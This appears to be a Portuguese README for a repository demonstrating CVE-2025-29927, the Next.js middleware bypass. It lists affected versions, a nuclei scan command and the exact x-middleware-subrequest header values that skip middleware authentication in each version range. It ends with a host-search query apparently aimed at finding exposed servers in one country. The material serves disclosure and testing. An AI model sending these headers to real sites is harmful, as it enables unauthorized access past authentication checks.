
CVE-2025-29927: Vulnerabilidade de Bypass de Middleware do Next.js
CVE-2025-29927: Vulnerabilidade de Bypass de Middleware do Next.js Este repositório demonstra a vulnerabilidade CVE-2025-29927 no Next.js, onde o cabeçalho interno x-middleware-subrequest pode ser usado para contornar verificações de middleware, como autenticação.
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9
Next.js 15.x < 15.2.3
Next.js 14.x < 14.2.25
Next.js 13.x < 13.5.9
nuclei -u https://example.com -t ./CVE-2025-29927.yaml -fr
Para versões anteriores a 12.2: x-middleware-subrequest: pages/_middleware x-middleware-subrequest: pages/dashboard/_middleware x-middleware-subrequest: pages/dashboard/panel/_middleware
Para versões 12.2 e posteriores: x-middleware-subrequest: middleware x-middleware-subrequest: src/middleware
Para versões 13.2.0 e posteriores: x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
header="x-middleware-rewrite" && country="IR"